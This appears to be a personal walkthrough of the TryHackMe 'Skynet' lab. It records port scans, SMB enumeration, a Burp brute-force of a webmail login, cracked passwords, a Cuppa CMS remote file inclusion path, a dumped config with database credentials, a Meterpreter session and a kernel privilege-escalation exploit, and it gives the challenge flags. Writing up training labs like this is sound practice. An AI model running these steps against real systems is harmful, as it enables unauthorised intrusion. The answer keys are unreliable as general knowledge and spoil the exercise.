Hacking a vulnerable Terminator themed Linux machine.
https://tryhackme.com/room/skynet
Task 1 - Deploy the Vulerable Machine
- Initial Nmap Scans
1
2
3
4
5
6
7
8
9
10
11
sudo nmap -Pn -sS -T4 -p- 10.10.70.205 -oN nmap_initial.txt
Nmap scan report for 10.10.70.205
Host is up (0.18s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
sudo nmap -sC -sV -T4 10.10.70.205 -p22,80,110,139,143,445 -oN nmap_second.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 10:06 PDT
Nmap scan report for 10.10.70.205
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL PIPELINING CAPA TOP UIDL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities ENABLE Pre-login LITERAL+ ID LOGIN-REFERRALS SASL-IR post-login IMAP4rev1 have OK IDLE more listed LOGINDISABLEDA0001
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-06-22T17:06:34
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-06-22T12:06:34-05:00
Enum4Linux
enum4linux -a 10.10.70.205 -R 139,445
- Notes from Scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[+] Got OS info for 10.10.70.205 from srvinfo: SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
=======================================( Users on 10.10.70.205 )=======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==================================( Share Enumeration on 10.10.70.205 )=================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
[+] Attempting to map shares on 10.10.70.205 //10.10.70.205/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.70.205/anonymous Mapping: OK Listing: OK Writing: N/A
//10.10.70.205/milesdyson Mapping: DENIED Listing: N/A Writing: N/A
[E] Cant understand response
NT_STATUS_OBJECT_NAME_NOT_FOUND listing
//10.10.70.205/IPC$ Mapping: N/A Listing: N/A Writing: N/A
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
SMB Client
smbclient //10.10.70.205/anonymous -U nobody -p 139 --workgroup=SKYNET
- log into smbclient with user nobody- get all the loot
log1.txt
is a wordlist maybe something useful.
Connect to miles SMB
1
2
3
4
5
smbclient '\\server\share'
mask ""
recurse ON
prompt OFF
mget *
Gobuster
- gobuster dir -u http://10.10.70.205:80/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -e
1
2
3
4
5
6
http://10.10.70.205:80/admin (Status: 301) [Size: 312] [--> http://10.10.70.205/admin/]
http://10.10.70.205:80/css (Status: 301) [Size: 310] [--> http://10.10.70.205/css/]
http://10.10.70.205:80/js (Status: 301) [Size: 309] [--> http://10.10.70.205/js/]
http://10.10.70.205:80/config (Status: 301) [Size: 313] [--> http://10.10.70.205/config/]
http://10.10.70.205:80/ai (Status: 301) [Size: 309] [--> http://10.10.70.205/ai/]
http://10.10.70.205:80/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.70.205/squirrelmail/]
Answer the questions below
What is Miles password for his emails?
- Capture in burpsuite proxy and insert log1.txt for password list
cyborg007haloterminator
- here we get milesdysons new samba password
)s{A&2Z=F^n_E.B
What is the hidden directory?
- checking the /notes/ folder in miles samba i found
important.txt
- leads us to
/45kra24zxs28v3yd
- which enumetation leads us to
/45kra24zxs28v3yd/administrator
- using searchsploit for cuppa we can find vulns
cat /usr/share/exploitdb/exploits/php/webapps/25971.txt
php code injection @
/alerts/alertConfigField.php?urlConfig=
- dump for the cuppa config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "password123";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
sql
What is the vulnerability called when you can include a remote file?
- remote file inclusion
/etc/issue
- Ubuntu 16.04.6 LTShttps://www.exploit-db.com/exploits/45010
What is the user flag?
- 7ce5c2109a40f958099283600a9ae807
What is the root flag?
- run linpeas.sh for enumeration
1
2
3
4
5
6
meterpreter > sysinfo
Computer : 10.10.221.179
OS : Ubuntu 16.04 (Linux 4.8.0-58-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
- compile and run https://www.exploit-db.com/exploits/44654
- travel to /root/
- 3f0372db24753accc7179a282cd6a949